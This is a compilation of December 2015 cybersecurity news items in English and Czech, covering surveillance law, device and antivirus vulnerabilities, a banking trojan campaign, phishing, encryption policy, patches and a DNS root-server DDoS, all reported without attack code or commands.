While speaking to the UK parliament's Commons Science and Technology Committee, Walker warned MPs of how the Draft Investigatory Powers Bill could be abused to turn any Internet-connected device into a snooping tool.
The draft Investigatory Powers Bill (or the Snooper's Charter) would make it the legal duty of Internet service providers (ISPs) to help and assist the British intelligence agencies in hacking into various connected devices if requested to do so.
Walker explained that anything connected to the Internet could theoretically be hacked into remotely and used by the authorities to snoop on criminals and suspects.
Smart Toys to Spy on People
"A range of devices that have been in the news recently, in relation to a hack, are children’s toys that children can interact with," Walker told the committee. "These are devices that may sit in a child’s bedroom but are accessible."
The innocent looking smart devices, including Smart Toys, such as Hello Barbie and My Friend Cayla – that come Wi-Fi enabled and have microphones and cameras built-in – could become spying tools for intelligence agencies to gain information such as:
What you just said.
What you watch on your home and what you don't.
The actual location of your washing machine, laundry baskets and dishwasher tables.
Where you put your keys, credit card, passport, and wallet.
"In theory, the manufacturer of those products could be the subject of a warrant to enable equipment interference with those devices," Walker said. "So the potential extent, I think, is something that needs to be carefully considered."
Walker also emphasised that the government should carefully consider how the "equipment interference" warrants should be used for electronic gadgets and make sure they're "only used when necessary and proportionate for a legitimate purpose."
Securing Smart Toys
Moreover, the security on connected devices should be tighter because it is not just government, but also criminals that can hack into these devices.
After concerns were raised early December by Bluebox Labs, Barbie's manufacturer Mattel reportedly tightened the security on Hello Barbie that allows kids to talk to dolls over a cloud server connection.
It's thought that other smart toy manufacturer companies will shortly follow the suite, especially after the news that Hong Kong toymaker VTech's systems were hacked, compromising 4.8 million records.

Hundreds of thousands of engine immobilizers remotely hackable

A New Zealander expert has found hundred of thousands of vulnerable engine immobilizers are remotely hackable due to a flaw.
The New Zealander Lachlan Temple (@skooooch) has discovered hundred of thousands of vulnerable engine immobilizers are remotely hackable. The expert discovered a flaw in a popular cheap car tracking and immobilizer gadget that can allow remote attackers to locate, eavesdrop, and in some cases interrupting the fuel supply to the engine to hundreds of thousands of vehicles, and more alarming, even while they are in motion.

Once the users have installed the engine immobilizers on their car they are able to remotely track the vehicle, block the engine, enable microphone recording, enable geo-fencing, and track the car movements.

The gadgets are rebranded by various vendors, including the Chinese ThinkRace, meanwhile in Australia the engine immobilizers are branded as “Response” and offered for sale at electronics chain JayCar for about A$150.

engine immobilizers

One of the models available on the market is able to control the car fuel pumps, a feature implemented to remotely immobilize a stolen vehicle, but Temple discovered that a an attacker could exploit a flaw in the management of session cookies to enable this function.

This means that while you are driving, someone everywhere is able to stop your engine!

Temple presented his findings at the Kiwicon security confab in Wellington, he added that today the flaws allow attackers who log into any account, including a demo account, to log into any of the 360,000 units ThinkRace that are sold without need of a password.

engine immobilizers 3
Lachlan Temple. Photo by Darren Pauli / The Register

“You just brute force everyone account, you can increment each one,” Temple told Vulture South. “You could disable someone’s car if they have wired the relay, so if that happened on a freeway that is pretty dangerous.” “Most people would wire it this way, that’s the main point of it and the reason why mechanics sell it.”

Temple suggests users to wire the relay to the starter motor, in this way a remote hacker cannot stop the engine while in motion and instead would prevent it starting up once turned off.

The flaws could be also exploited by attackers to access user personal details, including phone numbers, or eavesdrop on cars through the a microphone installed in the set of the engine immobilizers.

Temple discovered that the same tracker is used by ThinkRace in the watches sold to track children, in this case, an attacker can eavesdrop on kids and track them.

Temple announced that he will focus next test on more expensive tracking solution available on the market, including engine immobilizers used by commercial fleets of vehicles.

Stay Tuned …

France will not Ban Public Wi-Fi Or Tor Network, Prime Minister Valls Confirms
Despite the French Ministry of Interior's demands, France will not ban the TOR anonymity network or Free public Wi-Fi as a way to help the law enforcement fight terrorism.
French Prime Minister Manual Valls has gone on record saying that a ban on Free public Wi-Fi is "not a course of action envisaged," and he is not in favor of banning the TOR anonymity network, either.
Following the deadly terror attacks on Paris last month, an internal document obtained by Le Monde indicated that French government wanted to block communications of TOR as well as ban the use of Free Public Wi-Fi during states of emergency in an effort to fight terrorism more efficiently.
However, according to France PM, banning Encrypted Communications could affect the country's economy and security.
Must Read: FBI Director Asks Tech Companies to At least Don't Offer End-to-End Encryption
TOR and Free Wi-Fi Safe in France, PM Says
"A ban of [free public] Wi-Fi is not a course of action envisaged [and never has been]," Valls said (translated) on Wednesday.
Neither he is in favor of banning the TOR network, which encrypts and re-routes user traffic through a network of volunteer-operated servers, masking the real identities of users.
"Internet is a Freedom, is an extraordinary means of communication between people, it is a benefit to the economy," Valls added. "It's also a means for terrorists to communicate and spread their totalitarian ideology."
Therefore, he said the police must take some measures to improve their fight against terrorism in light of recent Paris attacks, but whatever measures they take to combat terrorism "must be effective."
The whole world response to recent Paris attacks involves lawmakers in the United States and Europe calling for new laws on technology, forcing the tech companies to put "backdoors" in their products and hand over encryption keys to the government on court orders.

New Spy Banker Trojan Telax exploits Google Cloud Servers

Security firm Zscaler discovered a malicious campaign based on a new strain of the Spy Banker banking malware.
Security experts at Zscaler discovered a malware-based campaign relying on a new strain of Spy Banker banking malware.

Spy Banker is an old threat, it was first detected in 2009, the new variant spreads over social media, primary through Facebook, and relies on social engineering to trick users into clicking shortened URLs over the promise of coupons, vouchers or premium software downloads.

Zscaler experts also observed a number of victims were also compromised by drive-by downloads.

According to the researchers, the Spy Banker banking malware has been targeting Portuguese-speaking victims in Brazil.

“Zscaler ThreatLabZ has been closely monitoring a new Spy Banker Trojan campaign that has been targeting Portuguese-speaking users in Brazil. The malware authors are leveraging Google Cloud Servers to host the initial Spy Banker Downloader Trojan,which is responsible for downloading and installing Spy Banker Trojan Telax.” states the post published by Zscaler.

The campaign, spotted by researchers at Zscaler, spreads primarily over social media—Facebook for the most part—and uses convincing social engineering to trick users into clicking shortened URLs over the promise of coupons, vouchers or premium software downloads. A number of victims were also compromised by drive-by downloads.

The use of social media platforms to spread the malware is very effective, it exploits the user’s trust of messages coming from its network of contacts.

The malicious URLs point to a server hosted on Google Cloud Servers which host the Spy Banker downloader that is dropped on the victim’s machine. The downloader then downloads the Spy Banker Trojan Telax, whose aim is to steal online banking credentials.

new spy banker trojan telax-abusing

In sample analyzed by Zscaler, the short URL points to a PHP files that’s hosted on a Google Cloud server. The PHP file then does a 302 redirect to download the initial Spy Banker Downloader Trojan payload.

In the attack illustrated by the experts, the executable file is posing to be Brazil’s federal revenue online tax returns service. In other cases observed by the researchers, the crooks used different themes offering discount vouchers and fake premium software applications.

The researchers revealed that this specific short URL had been clicked more than 103,000 times, 102,000 of which come Facebook.

new spy banker trojan telax-abusing 2

Google has already cleaned up the cloud servers involved in the malicious campaign.

“It is important to note that Google has already cleaned up the cloud servers being currently redirected by these two active sites and hence the infection cycle will fail with a 404 Not Found message,” Zscaler said.

Zscaler published a detailed analysis of the new variant of the Spy Banker Trojan Telax … enjoy it!

ZeroDB, the end-to-end encrypted database, goes open source

The End-to-end encrypted database ZeroDB becomes open source and its code is available on GitHub, try it and contribute to the community with your experience.
While politicians and experts are debating around encryption, the End-to-end encrypted database ZeroDB becomes open source and its code is available on GitHub.

ZeroDB is an end-to-end encrypted database in which the storage server knows nothing about the data it is storing, as reported on the official website query logic is performed client-side against encrypted data on a remote server, in this way even if the storage server is hacked, an attacker will not be able to view the unencrypted data.

ZeroDB allows users to develop applications with strong security with specific care to the end-user privacy. ZeroDB is particularly suitable for applications that need to store encrypted information on untrusted servers such as a public cloud storage.

zerodb 2

The database is based on Zope Object Database (ZODB), which is an object-oriented database for transparently and persistently storing Python objects, and written inPython.

“In ZeroDB, the client is responsible for the database logic. Data encryption, decryption and compression also happen client side. Therefore, the server never has any knowledge about the data, its structure or order,” it is explained in the documentation. “Since the server has no insight into the nature of the data, the risk of a server-side data breach is eliminated. Even if attackers successfully infiltrate the server, they won’t have access to the cleartext data,” the developers pointed out.

The user data on the server is always encrypted, at rest, in transit, and even when used. The developers behind the ZeroDB project, MacLane Wilkison and Michael Egorov, changed the license from proprietary to AGPLv3 early this week.

“Now that it’s open source, we want your help to make it better. Try it, build awesome things with it, break it. Then tell us about it.” states the post the officially announces ZeroDB goes open source. “Today, we’re releasing a Python implementation. A JavaScript client will be following soon.”

The ZeroDB is recommended for companies in the financial services industry, healthcare industry, government agencies, media companies and telecoms.

The announcement related to ZeroDB comes a few days after the one of Hashcat, the popular password recovery tool that has been released as open source under the MIT license.

Česko čelí útokům na hesla k účtům na Facebooku

10.12.2015 Sociální sítě
K útokům, které se snaží sofistikovanou formou vylákat od správců účtů hesla k firemním stránkám na Facebooku, dochází například z různých falešných profilů.  Před útoky varují analytici Esetu. Podle nich jsou ohrožení majitelé firemních účtů na sociální síti Facebook, přičemž vektorem ataků je sociální inženýrství, při němž se útočník snaží od své oběti vylákat heslo do této sociální sítě. Na firemní stránku na Facebooku zašle zprávu, v níž tvrdí, že firma použila na své „zdi“ fotografii, která porušuje jeho autorská práva. Zpráva obsahuje i URL adresu, která má směřovat na danou fotografii.

Ve skutečnosti je však správce firemního účtu na Facebooku přesměrován na falešnou stránku, která vypadá, jako by šlo o Facebook. Pokud si toho oběť nevšimne a do stránky vloží svoje přihlašovací jméno a heslo, okamžitě je získá útočník a už mu nic nebrání v tom, aby převzal plnou kontrolu nad účtem vaší firmy na Facebooku.

Na tyto praktiky upozornila experty facebooková komunita Nebezpečné, která se zabývá podvodnými stránkami. V některých případech byly weby napodobující vstupní stránku Facebooku registrovány přímo v České republice.

„Útočník může po získání hesla na vašem účtu na Facebooku propagovat svoje výrobky nebo webové stránky, na kterých je umístěna inzerce, na níž vydělá. Případně může tímto způsobem šířit po sociální síti škodlivý kód,“ říká Martin Skýpala, produktový specialista Esetu. „Jeho cílem je finanční zisk, vaší ztrátou však bude poškození dobrého jména společnost.“

Phishingové zprávy jsou v případech, které zaznamenali analytici, vždy psané v češtině. Útočník je odesílá buď přímo ze svého účtu na Facebooku (který může být zřízen na falešné jméno), nebo tak činí přes účty, k nimž už získal přístup a jejich majitelé o tom vůbec netuší.

V posledním případě se útočník dokonce vydával za zaměstnankyni mediálního domu Mafra. V jiném se falešná odesílatelka podepsala jako zaměstnankyně newyorské marketingové agentury Blue Fountain Media, ta však v České republice nemá ani pobočku.

Jako preventivní opatření se firmám doporučuje, aby zvyšovaly bezpečnostní povědomí u svých zaměstnanců. Ti by neměli bezhlavě klikat na jakékoli odkazy, které jim přijdou ať už přes zprávu na Facebooku nebo e-mailem.

Jelikož ale jde o phishingové stránky, dokáže je odchytit i bezpečnostní software s kvalitním antiphishingovým modulem. O tom, jaké následky může mít podobný útok, se přesvědčila na jaře letošního roku některá média na Slovensku, která ztratila kontrolu nad svými účty na Facebooku. Útočníci po ovládnutí jejich profilu vyřadili ostatní administrátory a zveřejňovali zprávy, které redakce nedokázaly nijak ovlivnit.

FBI Director Asks Tech Companies to At least Don't Offer End-to-End Encryption
FBI Director Asks Tech Companies to At least Don't Offer End-to-End Encryption
FBI declared War against Encryption.
Encryption is defeating government intelligence agencies to detect terrorist activities and after the recent ISIS-linked terror attacks in Paris and California, the issue has once again become a political target in Washington.
...and meanwhile, Kazakhstan plans to make it Mandatory for its Citizens to Install Internet Backdoor, allowing the government to intercept users' traffic to any secure website and access everything from web browsing history to usernames and passwords.
FBI: For God's Sake, Don't Use End-to-End Encryption
At a Senate hearing on Wednesday, FBI's Director James Comey called for tech companies currently providing users with end-to-end encryption to reconsider "their business model" and simply stop doing that, reported The Intercept.
Yes, instead of asking companies for a "backdoor" this time, Comey suggested them to adopt encryption techniques that help federal agencies intercept and turn over end-to-end encrypted communications when necessary.
"The government doesn't want a backdoor, but [it] hopes to get to a place where if a judge issues an order, the company figures out how to supply that information to the judge and figures out on its own the best way to do that," said Comey.
Comey: Keep Readable Version of Customers' Messages
End-to-end Encryption is a secure communication that encrypts the data on the sender's system before passing it to a company server. The company then passes the encrypted data to the intended recipient, who is the only person who can decrypt it.
Recommended Read: How to Install Let's Encrypt Free SSL Certificate On Your Website.
Nobody in between, be an application service provider, an Internet service provider (ISP), hacker, or even law enforcement officials, can read the data or tamper with it.
However, Comey is asking for the technology companies to retain a readable version of that initial data, just in case the authorities need it.
"There are plenty of companies today that provide secure services to their customers and still comply with court orders," he said. "There are plenty of folks who make good phones [and] are able to unlock them in response to a court order."
Terrorists and Encryption
Moreover, Comey also gave an example of a situation in which law enforcement officials faced obstacle because of encryption.
Also Read: Peerio — End-to-End Encrypted Secure Messenger and File Sharing App.
Here's the example Comey provided:
"In May, when two terrorists attempted to kill a whole lot of people in Garland, Texas, and were stopped by the action of great local law enforcement. That morning, before one of those terrorists, left to try to commit mass murder, he exchanged 109 messages with an overseas terrorist. We have no idea what he said because those messages were encrypted. That is a big problem."
You can watch his full speech at the Senate hearing in the video given below:

So at last, the FBI director did not actually make crystal clear exactly what measures he wants tech companies to adopt, or whether he had favor laws to force the companies to do it. But, he made partially clear that he is not at all satisfied with the current need to encrypt devices.

AVG, McAfee, and Kaspersky antivirus were vulnerable to critical flaw

Experts at enSilo have found a critical security vulnerability in various antivirus (AV) software that could be exploited by attackers to turn the AntiVirus to an attack-enabler tool.
Some of the most important security firms have had an ugly surprise, the security software they offer to their clints have been compromised by a serious vulnerability flaw that could be exploited to hack computers.

In March, the security researchers at enSilo firm discovered a serious vulnerability in the popular free antivirus engine AVG Internet Security 2015. The researchers discovered that the software was allocating memory for read, write, and execute (RWX) permissions in a predictable address. The knowledge of the memory address could be exploited by an attacker could to inject malicious code into the target system and execute it.

enSilo reported the vulnerability to AVG that promptly fixed it within a couple of days. The experts at enSilo decided to analyze other software commercialized by the principal security firms, including McAfee and Kaspersky.

They discovered that VirusScan Enterprise version 8.8 and Kaspersky Total Security 2015 were also affected by the vulnerability. Below the list of vulnerable products discovered by the experts:

For now we have found this vulnerability in the following Anti-Virus products. We’ll continue updating this list as we receive more information.

McAfee Virus scan Enterprise version 8.8. This vulnerability appears in their Anti Malware + Add-on Modules , scan engine version (32 bit) 5700.7163 , DAT version 7827.0000 , Buffer Overflow and Access Protection DAT version 659 , Installed patches: 4. We have notified McAfee and they have silently fixed it in their patch dated Aug. 20, 2015.
Kaspersky Total Security 2015 – – kts15.0.2.361en_7342. We have notified Kaspersky and they have silently fixed it in their patch dated Sept. 24, 2015.
AVG Internet Security 2015 build 5736 + Virus database 8919. As mentioned above, AVG has released their patch on March 12th.
The researchers plan to analyze other solutions and update the readers about the status of their security software.

“We’ll continue updating this list as we receive more information,” said Tomer Bitton, VP of research at enSilo, in a blog post.

“Given that this is a repetitive coding issue amongst Anti-Virus – an intrusive product, we believe that this vulnerability is also likely to appear in other intrusive products, non-security related, such as application-performing products.”

Other experts wrote about the security issue, Tavis Ormandy, security expert at Google, has written about a similar issue with Kaspersky software. In the blog post the hacker detailed how it is possible to exploit the security issue.

antivirus flaw pricelist

Considering the gravity of the problem and its widespread nature, enSilo has created a free checking tool called AVulnerabilityChecker to allow users checking if their machine is vulnerable.

“Considering the gravity of this issue, we created a tool – AVulnerabilityChecker – that checks whether an application running on your machine is vulnerable to this flaw. If vulnerable, AVulnerabilityChecker will not be able to tell you which application contains the flaw, but it will point out where to start the analysis.” states enSilo.

McAfee and Kaspersky have already fixed the security issue.

Budou mít všechny phishingové weby platný certifikát?

10.12.2015 Hrozby

S příchodem projektu Let's Encrypt se začaly ozývat hlasy, které se ptají, zda „certifikát zdarma pro všechny“ znamená i pro všechny phishingové a malware weby. Znamená to, že certifikát už není zárukou kvality a autorita ho vydá komukoliv, kdo si řekne? Bez ohledu na jeho úmysly a obsah jeho webu?

Na začátku se sluší připomenout, že Let's Encrypt je iniciativou Internet Security Research Group (ISRG), kterou podporuje mimo jiné Mozilla, Cisco, Facebook, EFF, Akamai a další. Cílem je odstranit všechny překážky k pohodlnému šifrování na webu a dát uživatelům automatické nástroje ke získání a nasazení HTTPS s důvěryhodným certifikátem. Nejen podle Let's Encrypt by totiž mělo být HTTPS pokud možno všude.

Autorita prošla beta testováním a před několika dny spustila vydávání certifikátů bez nutnosti mít pozvánku. Přestože je celý projekt stále označen jako beta, vydává důvěryhodné certifikáty a vy je můžete mít na svém webu.

Útoky šifrované a „bezpečné“

Velmi rychle se objevily výtky směrem k autoritě, konkrétně k vydávání certifikátu „pro všechny“. Autorita totiž nijak nezkoumá obsah webu a teoreticky tedy vydá certifikát třeba i phishingovému webu, kterému k vydání stačí jen možnost vystavovat soubory na správné cestě na serveru. Což samozřejmě není technicky problém zajistit a je pak úplně jedno, na jaké (sub)doméně takový web běží. Získá certifikát, kterým se pak může prokazovat uživatelům.

Falešný Facebook poznáte podle chybějícího zámečku… nebo ne?
Uživatelé se nejčastěji bojí toho, že web označený zeleným zámečkem bude vypadat důvěryhodněji a oni bez obav o svou bezpečnost vloží osobní údaje. Oni přeci psali, že to je bezpečné! Obavy jsou to jistě oprávněné, uživatelé mají tendenci věřit webu, na kterém je napsáno, že je bezpečný. Pokud je to ještě umocněno velkým obrázkem zámku, pak to musí být přeci v pořádku. Dnes je učíme, že se nemají dívat na obrázky na stránce, ale na ikonku zámku vedle adresy. Ta ale vlastně není správným indikátorem, protože neříká nic o obsahu webu.

Zvlášť u Domain Validated (DV) certifikátů není vlastně web nijak s validací svázán. Autoritě stačí, že žadatel o certifikát dokáže svou vazbu k doméně a/nebo webu na ní. Obvykle vystavením nějaké unikátní informace. Ano, z pohledu bezpečnosti je to špatný přístup, protože certifikační autorita vlastně žádnou opravdovou certifikaci neprovádí. Udělá jen velmi zběžnou kontrolu a vystaví o ní zprávu. Ale jednou jsme Pandořinu skříňku otevřeli a od DV certifikátů už není cesty zpět. Z hlediska uživatelů jsou ale stejně důvěryhodné (čti: zámeček je stejně zelený) jako standardní OV certifikáty.

Přestože takové certifikáty tu byly dávno před Let's Encrypt a různé autority dovolovaly automatickou komunikaci se žadatelem (a ani těch pár dolarů nepředstavuje pro útočníka problém), až nová iniciativa donutila dav zvednout obočí a zeptat se na to, zda „pro všechny“ opravdu znamená i pro provozovatele phishingových webů. Zřejmě proto, že Let's Encrypt je až „moc automatická“ a „moc zadarmo“, takže z hlediska svého principu už neklade vůbec žádné překážky.

Představitelé Let's Encrypt se k celému problému poměrně obšírně vyjádřili. Rozhodování pro nás bylo velmi těžké. Na jednu stranu tyhle stránky také nemáme rádi a naším cílem je budovat bezpečnější web. Na druhé straně si nejsme jisti, že by vydavatel certifikátů (přinejmenším Domain Validation) byl na úrovni, kde by měl dohlížet na phishingové a malwarové stránky. Ke cti provozovatelů autority je třeba říct, že tím na celý problém nerezignovali s pouhým konstatováním, že si to má řešit někdo jiný (PNJ).

Autority jsou špatnými hlídači

Na technické úrovni je situace jasná: DV certifikáty jen prokazují, že konkrétní veřejný klíč patří ke konkrétní doméně. V certifikátu není uvedeno, jak je doména (nebo dokonce obsah na ní) důvěryhodný, jak nakládá s informacemi a zda web neporušuje nějaká další pravidla. Rovněž chybí údaje o reálné identitě provozovatele webu – ani tohle není úkolem DV certifikátu. Přesto ale mnoho lidí věří tomu, že přítomnost důvěryhodného certifikátu naznačuje alespoň některé z těchto věcí.

Let's Encrypt ale vysvětluje, že certifikační autorita není v dobré pozici pro zásady proti phishingu a malware – nemá dostatečně kvalitní informace o obsahu webu. Mnohem lepší je spolupracovat s velkými organizacemi, které mají o obsahu mnohem lepší povědomí. Jako například Microsoft a Google, říká Josh Aas, výkonný ředitel ISRG. Jmenované společnosti cíleně procházejí web, sbírají z něj data a pomocí rozsáhlého strojového učení (řízeného desítkami lidí) mohou odhalovat nebezpečné webové stránky. O informace se pak dělí pomocí API, takže je možné od nich zjistit reputaci jednotlivých webů.

Josh Aas ale varuje, že ani taková spolupráce nemusí zaručovat úplnou jistotu. Změna obsahu webu může být rychlejší než vydání certifikátu nebo jeho revokace. Navíc problémová může být jen jediná stránka z celého webu, vysvětluje rozsah celého problému. Navíc, když autorita odmítne takovému webu vystavit certifikát, nijak ho tím neomezí. Jen prostě uživatelé neuvidí zelený zámeček. Uživatelé jsou mnohem lépe chráněni moderním prohlížečem, který obsahuje anti-phishing a anti-malware techniky a netrpí výše zmíněnými omezeními.

I kdyby se ale jedna z autorit rozhodla přísně obsah posuzovat a vlastními silami rozhodovat o důvěryhodnosti, nevyřeší to hlavní problém. Neexistuje totiž závazná metodika, kterou by se řídily stovky dalších autorit. Jinými slovy: nakonec by podezřelému webu certifikát vystavil někdo méně zodpovědný a uživatel by viděl stejně zelený zámeček. Zlí hoši si vždycky budou schopni certifikát obstarat a používat jej dostatečně dlouho, aby zneužili uživatele. Nezáleží na tom, jak dobře je na tom nejlepší autorita, ale jak dobře je na tom ta nejhorší. Záleží tu na nejslabším článku, který ale není těžké najít.

HTTPS bude životně důležité

Podle ředitele ISRG by se HTTPS mělo stát standardem a mělo by být jen další součástí technologické skládačky jako HTTP nebo TCP. Už nejsme v devadesátých letech, kdy bylo šifrování něčím nadstandardním jen pro banky a další „důležité“ weby. Od té doby se TLS rozšířilo do všech koutů webu, najdeme ho na sociálních sítích, e-mailových službách, elektronických obchodech, státní správě a podobně. Časem se stane naprostým standardem. Jakmile k tomu dojde, bude získání důvěryhodného certifikátu životně důležitou otázkou namísto ‚něčeho navíc‘. V takové chvíli může být chybné posouzení obsahu velmi nákladné, varuje Josh Aas.

Z technického hlediska povede taková chyba k výpadku, což je riziko, které s HSTS hrozí už dnes. Pokud už jednou Wikipedie prohlásila, že její servery se vždy musí prokazovat platným certifikátem, už nemůže své prohlášení změnit. Pokud by jí odmítly autority z nějakého důvodu další certifikát vystavit, stala by se pro své uživatele nedostupnou.

Z morálního hlediska by se ale autority dostaly do pozice, kdy by rozhodovaly o svobodě slova. Byly by velmi snadno zneužitelné k odstraňování nepohodlných webů – prostě by jim nevystavily životně důležitý certifikát. Chyby (neúmyslné či jiné) by v takovém případě znamenaly cenzuru, protože autority by se staly hlídači veřejného projevu a přítomnosti v online světě. A to pro certifikační autoritu není dobrá role, vysvětluje ředitel ISRG.

Hodnotit budou jiní

Alespoň na začátku bude tedy Let's Encrypt posuzovat důvěryhodnost webů pomocí Google Safe Browsing API a odmítne vystavit certifikát doménám, které jsou označené jako phishingové nebo obsahují malware. Google API je nejlepším zdrojem informací, které máme a pokusíme se dělat víc než jen získávat informace z tohoto API.

Boj proti závadným webům je podle ISRG velmi důležitý, ale certifikační autorita by neměla stát v čele tohoto boje. Let's Encrypt tedy implementujeme toto ověřování, protože se mnoha lidem nelíbí, že by na něj autorita měla úplně rezignovat, byť vydává pouze DV certifikáty. Rádi bychom ještě pokračovali v debatě, než opustíme to, co je podle mnoha lidí důležitým úkolem certifikační autority. I když s tím nesouhlasíme, uzavírá Josh Aas.

S nebezpečnými chybami se roztrhl pytel. Záplatuje Microsoft i Apple

10.12.2015 Zranitelnosti
Desítky bezpečnostních chyb ohrožují uživatele softwarových produktů od Applu i Microsoftu. Trhliny byly objeveny také v aplikaci Adobe Flash Player, kterou používají k přehrávání videí na internetu desítky miliónů lidí po celém světě. Záplaty chyb jsou však již k dispozici.
Více než pět desítek bezpečnostních chyb bylo objeveno v operačním systému OS X El Capitan. Prakticky stejné množství trhlin se ukrývá také v populární mobilní platformě iOS, kterou používají chytré telefony iPhone a počítačové tablety iPad.

Pro všechny výše uvedené bezpečnostní problémy již společnost Apple vydala aktualizace. To platí také o několika chybách, které byly objeveny v dalších aplikacích tohoto amerického počítačového gigantu, jako jsou Xcode, watchOS a tvOS.

Opravy byly vydány také pro více než sedm desítek chyb v operačním systému Windows. Desítky dalších trhlin byly odhaleny ve webových prohlížečích Internet Explorer a Microsoft Edge, ale také například v kancelářském balíku Office.

Kybernetičtí nájezdníci mohou chyby zneužít
Některé z chyb označili tvůrci za kritické. Kybernetický nájezdník je tak může zneužít k tomu, aby na napadeném stroji spustil libovolný škodlivý kód. Na cizí počítač tak může propašovat klidně nezvaného návštěvníka, který bude odchytávat každý stisk kláves. Relativně snadno pak získá všechna přístupová hesla uživatele.

Hackeři mohou zneužít také chyby ve Flash Playeru. Právě tento populární přehrávač on-line videí je v počtu objevených trhlin naprostý rekordman – nalezeno jich bylo bezmála osm desítek. Záplaty jsou naštěstí také již k dispozici.

Opravy bezpečnostních chyb všech tří výrobců je možné stahovat prostřednictvím automatických aktualizací, v některých případech jsou k dispozici také přímo na stránkách daných společností.

Microsoft pohřbí poslední podporovanou verzi Windows XP

10.12.2015 Hrozby
Společnost Microsoft oficiálně ukončila podporu pro operační systém Windows XP už loni v dubnu. Podporována zůstala pouze tzv. Embedded verze. Ale i to má skončit, definitivní tečku za touto stařičkou platformou udělá americký softwarový gigant už za pár týdnů – příští rok v lednu.
„Od ledna 2016 končí podpora operačního systému MS Windows XP Embedded. Tento operační systém byl, a stále ještě je, využíván zejména v bankomatech a řídících počítačích technologických procesů,“ uvedl Pavel Bašta, bezpečnostní analytik Národního bezpečnostního týmu CSIRT, který je provozován sdružením CZ.NIC.

Podle něj byla podpora Embedded verze prodloužena především proto, že se tak masivně používala v těchto důležitých odvětvích, jako je například bankovnictví.

Toho ale využívali i běžní uživatelé. „Existovaly též neoficiální postupy ukazující, jak využít softwarových záplat určených pro XP Embedded i u standardních Windows XP, což umožňovalo přežití tohoto operačního systému na mnoha domácích PC slabší konfigurace,“ konstatoval Bašta.

Žádné aktualizace
Ukončení podpory ze strany Microsoftu neznamená, že by tento populární operační systém přestal ze dne na den fungovat. S trochou nadsázky se dá říci, že Windows XP jsou nesmrtelná. Pokud o to uživatelé budou stát, mohou na počítačích fungovat klidně další desítky let.

Microsoft samotnou funkčnost nijak omezovat nebude, vše bude fungovat jako doposud. Vycházet však nebudou už nikdy žádné aktualizace a záplaty. To znamená, že pokud se v systému objeví nějaká bezpečnostní trhlina, kybernetičtí zločinci ji budou moci snadno zneužít k proniknutí do cizího PC.

„Ve chvíli, kdy problém bude přímo v operačním systému, bude relativně složité nebo nemožné se chránit proti některým typům útoků. S antivirem to bude jako pořídit si velmi bezpečné vchodové dveře do domu, ale klíč od nich schovat pod rohožku,“ uvedl již dříve manažer divize Windows Client společnosti Microsoft v České republice Lukáš Křovák.

Jde to i zadarmo
Vhodným řešením je tak z bezpečnostního hlediska přechod na novější systém. Vybírat uživatelé přitom nemusejí pouze ze stáje Windows – k dispozici mají i řadu bezplatných alternativ. [celá zpráva]

„Po tomto pravděpodobně již posledním hřebíčku do rakve dlouhou dobu nejoblíbenějšího OS již mají uživatelé pouze možnost přechodu na výkonnější hardware s novým operačním systémem, nebo nahradit XP některým z open source operačních systémů, jako GNU Linux či BSD,“ uzavřel bezpečnostní analytik týmu CSIRT.

Internet root servers flooded with 5 million queries a second

Two anomalous DDoS attacks have flooded the Internet root servers that received more than 5 million queries a second.
Early last week, anomalous DDoS attacks have threatened the Internet root servers that received more than 5 million queries a second.

“The authoritative name servers that serve the DNS root zone, commonly known as the “root servers”, are a network of hundreds of servers in many countries around the world. They are configured in the DNS root zone as 13 named authorities, as follows.” reads the IANA website.

Internet root servers

The Internet root servers are critical components of the global Internet infrastructure, they were targeted two times for an hour or more each. Multiple domain name system root servers were hit in the attacks, these systems are essential to associate a logical address to the IP address.

“On November 30, 2015 and December 1, 2015, over two separate intervals, several of the Internet Domain Name System’s root name servers received a high rate of queries. This report explains the nature and impact of the incident.” states an advisory published Friday “While it’s common for the root name servers to see anomalous traffic, including high query loads for varying periods of time, this event was large, noticeable via external monitoring systems, and fairly unique in nature, so this report is offered in the interests of transparency.”

The first DDoS attack occurred on Monday, November 30, and the Internet root servers were flooded for about two hours and 40 minutes. The second attack took place on December 1 and lasted an hour. The majority of the Internet root servers was hit in the cyber attacks which flooded the machines with billions of valid queries for two undisclosed domain names, one for each attack.

Despite a significant volume of traffic flooded the Internet Root servers, the Internet users did not suffer any disservice because root servers are involved in the address resolution only when a much larger network of intermediate DNS servers fail to do so.

Who it behind a so powerful attack?

At the rime I’m writing, there is no indication of a possible responsible, the unique certainly is a so powerful DDoS attack request a significant computing power and bandwidth.

The name servers targeted in the attack use IP Anycast, it is a network routing methodology in which datagrams from a single sender are routed to the topologically nearest node in a group of potential receivers, though it may be sent to several nodes, all identified by the same destination address.

The fact that attackers hit IP Anycast servers indicates that attackers coordinated resources geographically dispersed.

“This event was notable for the fact that source addresses were widely and evenly distributed, while the query name was not,” continues the advisory. “This incident, therefore, is different from typical DNS amplification attacks whereby DNS name servers (including the DNS root name servers) have been used as reflection points to overwhelm some third party.”

The experts speculate the involvement of a large botnet, likely composed of a huge number of IoT devices. Such kind of attacks could be prevented by implementing the BCP 38, the Internet Engineering Task Force standard for defeating IP address spoofing.

NCA launched #CyberChoice campaign, to prevent youngsters become cyber criminals

The Britain’s National Crime Agency (NCA) has launched this week #CyberChoices campaign that targets parents of youngsters aged 12-15 to explain them how it is easy to be involved in cyber criminal activities.
Are script kiddies a real threat? The Britain’s National Crime Agency (NCA) thinks so and launched a campaign to discourage teens from hacking activities after it has found the average age of suspects had plummeted to 17.

The decision is not unreasonable, the law enforcement noticed that the average age of the suspects has plummeted to 17. Hacking is becoming an attractive lifestyle, it’s cool, and a growing number are approaching it without having the perception of the consequences.

“Over the past few years the NCA has seen the people engaging in cyber crime becoming younger and younger,” said Richard Jones, head of the National Cyber Crime Unit’s Prevent team.

According to the officers from the NCA, the average age of suspected cyber criminals featured in investigations involving the NCA in 2015 year was 17, compared to 24 observed in 2014.

“We know that simply criminalizing young people cannot be the solution to this and so the campaign seeks to help motivate children to use their skills more positively,” Jones added.

“These individuals are really bright and have real potential to go on to exciting and fulfilling jobs. But by choosing the criminal path they can move from low level ‘pranking’ to higher level cyber crime quite quickly,”

NCA computer

The NCA has launched the #CyberChoices campaign that targets parents of youngsters aged 12-15 to explain them how it is easy to be involved in cyber criminal activities, even without their knowledge.

The official advertisement presented by the NCA features a young boy with his family on a sofa, with the parents vaunting about IT expertise of their son.

But when the parents reveal that he joked about robbing a bank that the they realize their son is cyber criminal. The spot ends with the entire family being quizzed by officers from the NCA.

